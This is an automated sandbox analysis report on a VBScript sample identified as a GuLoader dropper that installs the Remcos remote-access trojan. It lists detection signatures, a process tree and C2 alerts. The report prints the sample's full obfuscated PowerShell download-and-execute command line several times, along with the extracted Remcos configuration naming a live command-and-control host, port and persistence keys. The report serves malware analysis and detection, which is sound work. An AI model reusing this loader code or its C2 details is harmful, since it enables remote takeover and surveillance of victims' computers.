
Windows Analysis Report
Strait STS.vbs

Overview

General Information

Sample name: Strait STS.vbs
Analysis ID: 1573519
MD5: e6c71bbe4f758fb7c79ac21e9c514977
SHA1: 8a491650c20b51b8ccaeb4d76464b01ab1f15ef7
SHA256: 96e58c4ebcebd2972a1f50671fe2c43a89caa4c078767952ddcade51985d4a3f
Tags: GuLoader, vbs, user-abuse_ch

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Potential malicious VBS script found (suspicious strings)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 880 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Strait STS.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2356 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Ndhjlps='Kontinentalsokkel';;$Klauber101='Catadioptrical';;$Marksmen='Kalfaktorens';;$Unlivableness='Limewort';;$Proctoplastic=$host.Name; function Exposes($Kataloger){If ($Proctoplastic) {$Cognacagtigeres='Corollaceous';$Unintelligently103=4;$credoerne=$Unintelligently103}do{$Defeats+=$Kataloger[$credoerne];$credoerne+=5} until(!$Kataloger[$credoerne])$Defeats}function Nonprecipitation225($Civvy){ .($hesperornithid) ($Civvy)}$Underekstremiteten=Exposes 'Le.iNKompESubtt C.e.Depow';$Underekstremiteten+=Exposes 'broneAn eb s mCUntolWaleiSidsefotoNOv rT';$Chemotherapy=Exposes 'NondMTresoEarlzOocyi indlFriglT etakom /';$Valsk=Exposes ' PreTEme lStubsTrag1 tim2';$Gevandterne='E fa[ HulnBraiE G dT V b.DilaSS ereEndarUnruv .reIbeboC fsaETermPSygeO BroiPiroNDuodtBareM CocAWr tN ,ona M.lGAlabea terHols]Augm:Aftv:RigssDekaEN ffCUltrU,tomROut i SmytD ngyMercPDomerU.efOAtriTf,glORaadcNe,roBeyol Fej=Batt$ flav TotARan LSvrls,jreK';$Chemotherapy+=Exposes 'Ca o5 A,b.Sk b0 Xen I,te(DingWelskiRequnDrifdudmaoTmniwGrnssO,by ,oflNBur.TZone Camo1Spur0R ln.Groi0.nth;Sfi actoWBu diHaywnF,rv6G,ni4Skat; G,e ParaxGudf6K.us4A st; opr dionrMic vOmt :F,id1Stor3Nykk1Reca.,prn0Dela) Cen OutG Ap eSrskcDotik NicoA,ou/Ball2Brag0 For1 Leu0Tims0Band1 Sy 0Mamm1Cond PsaFDyreiAndrrEnsleHincfSan o bemxAnal/Myos1Soci3Kalo1Bavl.Derm0';$Erhvervssygdommene=Exposes 'MargUA foSTumieImpornani- DogAImplGFluoE KolnPu.pt';$Ridableness=Exposes 'Miljh Shit nultRubbp vasergs:L.dg/Voci/OutroCutlfWall1Hgt xRedi.CafiiRepocglobuf,ng/Ydrert lbx SerHB llERo kjLin EAn kYPimpEUnde/ChifNDepri D.kc entkUnive Gy.lKri i OveztermaLykktIndbiFusioEtikn Lep.K.nfcKrels No.v';$Samariteruddannelse=Exposes 'Nids>';$hesperornithid=Exposes ' ineIStrue oncx';$Arbejdstilbud216='Delelejligheds';$Stenvindenes49='\huguenotism.Bed';Nonprecipitation225 (Exposes ' Sac$BikagBondlThe O,onoB mpea belLupsl:IleomThomoletmDSubfEev lNFunkHArkie nrDI 
peESeksROrd NBolseUmedST,as= Kl.$ InkerefrnDeutvd hy:lollATa nP utPl ddDAdelaFod Tb tuaP,ja+Plag$mokeSAdretPr aEnvernHoveVInfri SanNChacdKroeE CooN KameNon Sconc4 Cap9');Nonprecipitation225 (Exposes 'Non $ TecGRentlKuldonondBBe aaFiskL Und:Ko,en oesa.orhRFi ucSmudODepaS HydIM loSIlio=Hove$CrosR opnISupeDTilsaTereB NonlIde e M snForseKanaSInkusTra .dic,sbolip nefLHemaIRifft Ou ( V r$FaldS Coha VarmPrivaOutwrAnneiSto T Apteh,emrmoruUCystD ildBilbA MonNTinsNK.atELoseLMed sClime Rip)');Nonprecipitation225 (Exposes $Gevandterne);$Ridableness=$Narcosis[0];$fike=(Exposes ' Hom$GangGDiscLGensoS ngB MagAEth l.ord:StroTPerivraadINovis Fort.ikrERoerPDipoUDavinIrreKCaritBambE,pitTUng sAden=Encyn ChaEafbeWSkaa-DrifO manBSub.jBredEBaylCK,tttnone TessByggyR glsChaut LeveFdsemSoci.Real$ForsUTidsnInd DVlteE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,uAe.enSta kHiggtSliseLoyktImmusBatz. 
hawHBargeBefra FandForlePlowr P dsBenp[,yds$MallEGra,r Cheh S evKulteSwelrTellv RemsKomps .ury AksgEnerd hino arkmArchmNaboeasshn ndle L n]Symb=Stra$ TilCSa bh rydeGatfm ewoIndgtBronhForbeT ddrSupea stapChesy');$Faerie=Exposes 'Hved$C emTGasavTaariCompsinqutBozaec nvpKarau DiknRe ik Jartteame Rr tSkots ps.TungDPantoFoulwCockn ilgl ParoA enaPit.dKretF I tiCop lstemeEl c(Gath$Ka.tRRabaiFlerdDravaOp pbM dllPar eP lmn At eOomisBattsR ot, fon$LsniEPro.xProjcangie K vpGirrtSinfoSquarFast)';$Exceptor=$Modenhedernes;Nonprecipitation225 (Exposes 'Cerb$I dkgMethlU drO nivBboucAK lvLUnna: LykSProjtUndeaintemSym,cRhodELipol vrtlMisyeMeddROrthnFleaendes=Inse(Rev tNoddE sims Allt Sai- acpAppla.ehjt Br.HC.st Sik$ApotesubrXEnkecToilEWarePTes TCabroDiodR Hes)');while (!$Stamcellerne) {Nonprecipitation225 (Exposes 'Semi$Re.sgHjvelA,tooJo.rbAutoaSu elEnkr:SigvSEmbekSlariPlanfD,bltLandeSweeb SpoeVarmh rapaSignnTestdBn.elBo,tiMystnPolygActis vlv=Slad$Non B Spir Notn InveIndihDrikaUn evAmieeLockpMucidbo kaSalmgGl.woToilgSucreBlocra ganSlokeTears') ;Nonprecipitation225 $Faerie;Nonprecipitation225 (Exposes ' rdeSDrueTBloca,jaeR ol.TT nn-AstrsUnchl ideeD spe SkrPU,gi Ud,o4');Nonprecipitation225 (Exposes ' Bra$ ntgRetslPl toNonpBEddiABes Lmi t:,mpoSTonetArguA Pa MPlascFiniES.aml FeslDeavEKommrPhotn riseFink=Ce.t(Ru.dT.verefylds tanTSkaa- CabpSt,ga uldTlaurH Inc Lys.$Mi.sEA tix N nCRserE verP artUndeOSammRUnr,)') ;Nonprecipitation225 (Exposes ' Cor$PalsgAddilProtoDankBvinyAKbstl R s:ProbJA phe riR KonnCropBlderATuesNRentEvisusT azTRdblAN.leTRokeIKretoKnobNToqu= Sa,$ Sa G Alml Kr.OBrygbSp,ca InaL Dis:reflDFerlI VrdP In,hSkoveOrign .nfH Ergy Ju dCol rLfteAT,lemConciFolkNUanse eps+ Ove+ Sal%a,pr$Ta.lnBrdbaP.arRNonccSkbnOE,nrSRaaki BlosStiv. 
TilCS inO,angu alln Fo T') ;$Ridableness=$Narcosis[$jernbanestation]}$Radiatory=326426;$Huppahs176=31719;Nonprecipitation225 (Exposes 'Toll$Kempg SublExc O .aabKorsAUdadl Tal:KonfyhebenFremDAutal SvmIVejoN AlrGHjemsKr mOUnd,fEvelfStaneFremr Spr ,amm=Seam L vegM nheronttTran-Obduc RelOAchiNK.dnTFlete lanGomatBedf Pea$ kuleUdstxEm ncEgene,utipWurztAlloOPedar');Nonprecipitation225 (Exposes '.lal$Caddg BonloveroBervbhal a ompl efj:Hy eE N,tkMisasPar.pSkoloamstrMeattStr vSyrurAdumd Sc,iOrph V.s=Va.e Gide[EnwhS Ud yStttsFir tProteVentmSis .cockCErhvo hronRav,v AdveDetor IsotFeed]Squa: His:Hos.FturtrKe.no ommCephBF elaSprnstodaeCadu6Sekh4StvkSV.cutScarrFr,tiPartn oligKrko( Sub$ CupYEs,an T,ddC,arl O,siM linKl ngMisasMegao .omfAbstfFej eS,ovr b g)');Nonprecipitation225 (Exposes 'Bskt$.risGEfteLSubpODaviBMedeAConil,ovi: kovT Ar.a KarlOwlgNNaziEBastTUdviTUfore MowNPlanEMeni Skil= Lac For[geomsAcroYSoljS nmetLu eE Be mKont. esttTilse ennXBobltL se.Konse SygnForfCLsbaoBde DGraiIVmmenC utGFico] la:Phot:TaleAPyrrS rocPaa IBundIUros. .ylgEmpuE Un tUn.ss CenTski rBesgII.den rosG Pee(Gn v$S lfEKhutKKnogsSupppKapioN.ncrFyldT VetV ad rPrisdJernI Teu)');Nonprecipitation225 (Exposes 'Dete$Ex agUnd LtimeoDr kbInglAundelFre,:SexiT NonrUdmaA T lMDiaePGl uAD smgSiddE Syn= Kvl$Mic.tGrasAReadLBootNCaboEBranTsanstStyreoplsnSillEMell.F.thSSulpu F,rbGermS nitTFjelRDistIVrign R kgMon (A sk$UlmorInapAsem,d,phaiMonoaPre TPe soUnexr Amuy ain,Outt$i juHAftauStilp BarpCa,raMundHCyclsTnde1B.dr7 Und6Hema)');Nonprecipitation225 $Trampage;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7452 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Ndhjlps='Kontinentalsokkel';;$Klauber101='Catadioptrical';;$Marksmen='Kalfaktorens';;$Unlivableness='Limewort';;$Proctoplastic=$host.Name; function Exposes($Kataloger){If ($Proctoplastic) {$Cognacagtigeres='Corollaceous';$Unintelligently103=4;$credoerne=$Unintelligently103}do{$Defeats+=$Kataloger[$credoerne];$credoerne+=5} until(!$Kataloger[$credoerne])$Defeats}function Nonprecipitation225($Civvy){ .($hesperornithid) ($Civvy)}$Underekstremiteten=Exposes 'Le.iNKompESubtt C.e.Depow';$Underekstremiteten+=Exposes 'broneAn eb s mCUntolWaleiSidsefotoNOv rT';$Chemotherapy=Exposes 'NondMTresoEarlzOocyi indlFriglT etakom /';$Valsk=Exposes ' PreTEme lStubsTrag1 tim2';$Gevandterne='E fa[ HulnBraiE G dT V b.DilaSS ereEndarUnruv .reIbeboC fsaETermPSygeO BroiPiroNDuodtBareM CocAWr tN ,ona M.lGAlabea terHols]Augm:Aftv:RigssDekaEN ffCUltrU,tomROut i SmytD ngyMercPDomerU.efOAtriTf,glORaadcNe,roBeyol Fej=Batt$ flav TotARan LSvrls,jreK';$Chemotherapy+=Exposes 'Ca o5 A,b.Sk b0 Xen I,te(DingWelskiRequnDrifdudmaoTmniwGrnssO,by ,oflNBur.TZone Camo1Spur0R ln.Groi0.nth;Sfi actoWBu diHaywnF,rv6G,ni4Skat; G,e ParaxGudf6K.us4A st; opr dionrMic vOmt :F,id1Stor3Nykk1Reca.,prn0Dela) Cen OutG Ap eSrskcDotik NicoA,ou/Ball2Brag0 For1 Leu0Tims0Band1 Sy 0Mamm1Cond PsaFDyreiAndrrEnsleHincfSan o bemxAnal/Myos1Soci3Kalo1Bavl.Derm0';$Erhvervssygdommene=Exposes 'MargUA foSTumieImpornani- DogAImplGFluoE KolnPu.pt';$Ridableness=Exposes 'Miljh Shit nultRubbp vasergs:L.dg/Voci/OutroCutlfWall1Hgt xRedi.CafiiRepocglobuf,ng/Ydrert lbx SerHB llERo kjLin EAn kYPimpEUnde/ChifNDepri D.kc entkUnive Gy.lKri i OveztermaLykktIndbiFusioEtikn Lep.K.nfcKrels No.v';$Samariteruddannelse=Exposes 'Nids>';$hesperornithid=Exposes ' ineIStrue oncx';$Arbejdstilbud216='Delelejligheds';$Stenvindenes49='\huguenotism.Bed';Nonprecipitation225 (Exposes ' Sac$BikagBondlThe O,onoB mpea belLupsl:IleomThomoletmDSubfEev lNFunkHArkie nrDI 
peESeksROrd NBolseUmedST,as= Kl.$ InkerefrnDeutvd hy:lollATa nP utPl ddDAdelaFod Tb tuaP,ja+Plag$mokeSAdretPr aEnvernHoveVInfri SanNChacdKroeE CooN KameNon Sconc4 Cap9');Nonprecipitation225 (Exposes 'Non $ TecGRentlKuldonondBBe aaFiskL Und:Ko,en oesa.orhRFi ucSmudODepaS HydIM loSIlio=Hove$CrosR opnISupeDTilsaTereB NonlIde e M snForseKanaSInkusTra .dic,sbolip nefLHemaIRifft Ou ( V r$FaldS Coha VarmPrivaOutwrAnneiSto T Apteh,emrmoruUCystD ildBilbA MonNTinsNK.atELoseLMed sClime Rip)');Nonprecipitation225 (Exposes $Gevandterne);$Ridableness=$Narcosis[0];$fike=(Exposes ' Hom$GangGDiscLGensoS ngB MagAEth l.ord:StroTPerivraadINovis Fort.ikrERoerPDipoUDavinIrreKCaritBambE,pitTUng sAden=Encyn ChaEafbeWSkaa-DrifO manBSub.jBredEBaylCK,tttnone TessByggyR glsChaut LeveFdsemSoci.Real$ForsUTidsnInd DVlteE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,uAe.enSta kHiggtSliseLoyktImmusBatz. 
hawHBargeBefra FandForlePlowr P dsBenp[,yds$MallEGra,r Cheh S evKulteSwelrTellv RemsKomps .ury AksgEnerd hino arkmArchmNaboeasshn ndle L n]Symb=Stra$ TilCSa bh rydeGatfm ewoIndgtBronhForbeT ddrSupea stapChesy');$Faerie=Exposes 'Hved$C emTGasavTaariCompsinqutBozaec nvpKarau DiknRe ik Jartteame Rr tSkots ps.TungDPantoFoulwCockn ilgl ParoA enaPit.dKretF I tiCop lstemeEl c(Gath$Ka.tRRabaiFlerdDravaOp pbM dllPar eP lmn At eOomisBattsR ot, fon$LsniEPro.xProjcangie K vpGirrtSinfoSquarFast)';$Exceptor=$Modenhedernes;Nonprecipitation225 (Exposes 'Cerb$I dkgMethlU drO nivBboucAK lvLUnna: LykSProjtUndeaintemSym,cRhodELipol vrtlMisyeMeddROrthnFleaendes=Inse(Rev tNoddE sims Allt Sai- acpAppla.ehjt Br.HC.st Sik$ApotesubrXEnkecToilEWarePTes TCabroDiodR Hes)');while (!$Stamcellerne) {Nonprecipitation225 (Exposes 'Semi$Re.sgHjvelA,tooJo.rbAutoaSu elEnkr:SigvSEmbekSlariPlanfD,bltLandeSweeb SpoeVarmh rapaSignnTestdBn.elBo,tiMystnPolygActis vlv=Slad$Non B Spir Notn InveIndihDrikaUn evAmieeLockpMucidbo kaSalmgGl.woToilgSucreBlocra ganSlokeTears') ;Nonprecipitation225 $Faerie;Nonprecipitation225 (Exposes ' rdeSDrueTBloca,jaeR ol.TT nn-AstrsUnchl ideeD spe SkrPU,gi Ud,o4');Nonprecipitation225 (Exposes ' Bra$ ntgRetslPl toNonpBEddiABes Lmi t:,mpoSTonetArguA Pa MPlascFiniES.aml FeslDeavEKommrPhotn riseFink=Ce.t(Ru.dT.verefylds tanTSkaa- CabpSt,ga uldTlaurH Inc Lys.$Mi.sEA tix N nCRserE verP artUndeOSammRUnr,)') ;Nonprecipitation225 (Exposes ' Cor$PalsgAddilProtoDankBvinyAKbstl R s:ProbJA phe riR KonnCropBlderATuesNRentEvisusT azTRdblAN.leTRokeIKretoKnobNToqu= Sa,$ Sa G Alml Kr.OBrygbSp,ca InaL Dis:reflDFerlI VrdP In,hSkoveOrign .nfH Ergy Ju dCol rLfteAT,lemConciFolkNUanse eps+ Ove+ Sal%a,pr$Ta.lnBrdbaP.arRNonccSkbnOE,nrSRaaki BlosStiv. 
TilCS inO,angu alln Fo T') ;$Ridableness=$Narcosis[$jernbanestation]}$Radiatory=326426;$Huppahs176=31719;Nonprecipitation225 (Exposes 'Toll$Kempg SublExc O .aabKorsAUdadl Tal:KonfyhebenFremDAutal SvmIVejoN AlrGHjemsKr mOUnd,fEvelfStaneFremr Spr ,amm=Seam L vegM nheronttTran-Obduc RelOAchiNK.dnTFlete lanGomatBedf Pea$ kuleUdstxEm ncEgene,utipWurztAlloOPedar');Nonprecipitation225 (Exposes '.lal$Caddg BonloveroBervbhal a ompl efj:Hy eE N,tkMisasPar.pSkoloamstrMeattStr vSyrurAdumd Sc,iOrph V.s=Va.e Gide[EnwhS Ud yStttsFir tProteVentmSis .cockCErhvo hronRav,v AdveDetor IsotFeed]Squa: His:Hos.FturtrKe.no ommCephBF elaSprnstodaeCadu6Sekh4StvkSV.cutScarrFr,tiPartn oligKrko( Sub$ CupYEs,an T,ddC,arl O,siM linKl ngMisasMegao .omfAbstfFej eS,ovr b g)');Nonprecipitation225 (Exposes 'Bskt$.risGEfteLSubpODaviBMedeAConil,ovi: kovT Ar.a KarlOwlgNNaziEBastTUdviTUfore MowNPlanEMeni Skil= Lac For[geomsAcroYSoljS nmetLu eE Be mKont. esttTilse ennXBobltL se.Konse SygnForfCLsbaoBde DGraiIVmmenC utGFico] la:Phot:TaleAPyrrS rocPaa IBundIUros. .ylgEmpuE Un tUn.ss CenTski rBesgII.den rosG Pee(Gn v$S lfEKhutKKnogsSupppKapioN.ncrFyldT VetV ad rPrisdJernI Teu)');Nonprecipitation225 (Exposes 'Dete$Ex agUnd LtimeoDr kbInglAundelFre,:SexiT NonrUdmaA T lMDiaePGl uAD smgSiddE Syn= Kvl$Mic.tGrasAReadLBootNCaboEBranTsanstStyreoplsnSillEMell.F.thSSulpu F,rbGermS nitTFjelRDistIVrign R kgMon (A sk$UlmorInapAsem,d,phaiMonoaPre TPe soUnexr Amuy ain,Outt$i juHAftauStilp BarpCa,raMundHCyclsTnde1B.dr7 Und6Hema)');Nonprecipitation225 $Trampage;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 7768 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["154.216.18.216:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7K8JAD", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
0000000A.00000002.1610779678.0000000008EC0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
0000000D.00000002.2546894323.00000000069CE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000D.00000002.2546894323.00000000069FA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000A.00000002.1612779996.000000000971E000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
0000000A.00000002.1593326524.000000000616F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
Source | Rule | Description | Author | Strings
amsi64_2356.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_7452.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
              • 0xc499:$b2: ::FromBase64String(
              • 0xb511:$s1: -join
              • 0x4cbd:$s4: +=
              • 0x4d7f:$s4: +=
              • 0x8fa6:$s4: +=
              • 0xb0c3:$s4: +=
              • 0xb3ad:$s4: +=
              • 0xb4f3:$s4: +=
              • 0x15a87:$s4: +=
              • 0x15b07:$s4: +=
              • 0x15bcd:$s4: +=
              • 0x15c4d:$s4: +=
              • 0x15e23:$s4: +=
              • 0x15ea7:$s4: +=
              • 0xbd3d:$e4: Get-WmiObject
              • 0xbf2c:$e4: Get-Process
              • 0xbf84:$e4: Start-Process
              • 0x166fd:$e4: Get-Process

              System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Strait STS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Strait STS.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Strait STS.vbs", ProcessId: 880, ProcessName: wscript.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 172.67.216.143, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7768, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49776
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Strait STS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Strait STS.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Strait STS.vbs", ProcessId: 880, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Ndhjlps='Kontinentalsokkel';;$Klauber101='Catadioptrical';;$Marksmen='Kalfaktorens';;$Unlivableness='Limewort';;$Proctoplastic=$host.Name; function Exposes($Kataloger){If ($Proctoplastic) {$Cognacagtigeres='Corollaceous';$Unintelligently103=4;$credoerne=$Unintelligently103}do{$Defeats+=$Kataloger[$credoerne];$credoerne+=5} until(!$Kataloger[$credoerne])$Defeats}function Nonprecipitation225($Civvy){ .($hesperornithid) ($Civvy)}$Underekstremiteten=Exposes 'Le.iNKompESubtt C.e.Depow';$Underekstremiteten+=Exposes 'broneAn eb s mCUntolWaleiSidsefotoNOv rT';$Chemotherapy=Exposes 'NondMTresoEarlzOocyi indlFriglT etakom /';$Valsk=Exposes ' PreTEme lStubsTrag1 tim2';$Gevandterne='E fa[ HulnBraiE G dT V b.DilaSS ereEndarUnruv .reIbeboC fsaETermPSygeO BroiPiroNDuodtBareM CocAWr tN ,ona M.lGAlabea terHols]Augm:Aftv:RigssDekaEN ffCUltrU,tomROut i SmytD ngyMercPDomerU.efOAtriTf,glORaadcNe,roBeyol Fej=Batt$ flav TotARan LSvrls,jreK';$Chemotherapy+=Exposes 'Ca o5 A,b.Sk b0 Xen I,te(DingWelskiRequnDrifdudmaoTmniwGrnssO,by ,oflNBur.TZone Camo1Spur0R ln.Groi0.nth;Sfi actoWBu diHaywnF,rv6G,ni4Skat; G,e ParaxGudf6K.us4A st; opr dionrMic vOmt :F,id1Stor3Nykk1Reca.,prn0Dela) Cen OutG Ap eSrskcDotik NicoA,ou/Ball2Brag0 For1 Leu0Tims0Band1 Sy 0Mamm1Cond PsaFDyreiAndrrEnsleHincfSan o bemxAnal/Myos1Soci3Kalo1Bavl.Derm0';$Erhvervssygdommene=Exposes 'MargUA foSTumieImpornani- DogAImplGFluoE KolnPu.pt';$Ridableness=Exposes 'Miljh Shit nultRubbp vasergs:L.dg/Voci/OutroCutlfWall1Hgt xRedi.CafiiRepocglobuf,ng/Ydrert lbx SerHB llERo kjLin EAn kYPimpEUnde/ChifNDepri D.kc entkUnive Gy.lKri i OveztermaLykktIndbiFusioEtikn Lep.K.nfcKrels No.v';$Samariteruddannelse=Exposes 'Nids>';$hesperornithid=Exposes ' ineIStrue oncx';$Arbejdstilbud216='Delelejligheds';$Stenvindenes49='\huguenotism.Bed';Nonprecipitation225 
(Exposes ' Sac$BikagBondlThe O,onoB mpea belLupsl:IleomThomoletmDSubfEev lNFunkHArkie nrDI peESeksROrd NBolseUmedST,as= Kl.$ InkerefrnDeutvd hy:lollATa nP utPl ddDAdelaFod Tb tuaP,ja+Plag$mokeSAdretPr aEnvernHoveVInfri SanNChacdKroeE CooN KameNon Sconc4 Cap9');Nonprecipitation225 (Exposes 'Non $ TecGRentlKuldonondBBe aaFiskL Und:Ko,en oesa.orhRFi ucSmudODepaS HydIM loSIlio=Hove$CrosR opnISupeDTilsaTereB NonlIde e M snForseKanaSInkusTra .dic,sbolip nefLHemaIRifft Ou ( V r$FaldS Coha VarmPrivaOutwrAnneiSto T Apteh,emrmoruUCystD ildBilbA MonNTinsNK.atELoseLMed sClime Rip)');Nonprecipitation225 (Exposes $Gevandterne);$Ridableness=$Narcosis[0];$fike=(Exposes ' Hom$GangGDiscLGensoS ngB MagAEth l.ord:StroTPerivraadINovis Fort.ikrERoerPDipoUDavinIrreKCaritBambE,pitTUng sAden=Encyn ChaEafbeWSkaa-DrifO manBSub.jBredEBaylCK,tttnone TessByggyR glsChaut LeveFdsemSoci.Real$ForsUTidsnInd DVlteE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,uAe.enSta kHiggtSliseLoyktImmusBatz. hawHBargeBefra

              Stealing of Sensitive Information

Source: Registry Key set | Author: Joe Security | Data: Details: F6 D9 F9 01 8F BC 7D 88 8A C0 4F 4E 28 1D 60 D6 04 B7 A4 2D C8 1F 38 A3 F2 36 66 57 7D 18 72 E2 E9 6B B9 93 04 47 D0 F2 62 EA 6E 13 DD 23 D4 5F 7D 4A C0 D4 C3 79 F4 AE 21 C3 40 A0 FF DA AD D9 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 7768, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-7K8JAD\exepath
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-12T07:54:02.268298+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49946 | 154.216.18.216 | 2404 | TCP
2024-12-12T07:55:17.429700+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49786 | 154.216.18.216 | 2404 | TCP
2024-12-12T07:55:40.476958+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49841 | 154.216.18.216 | 2404 | TCP
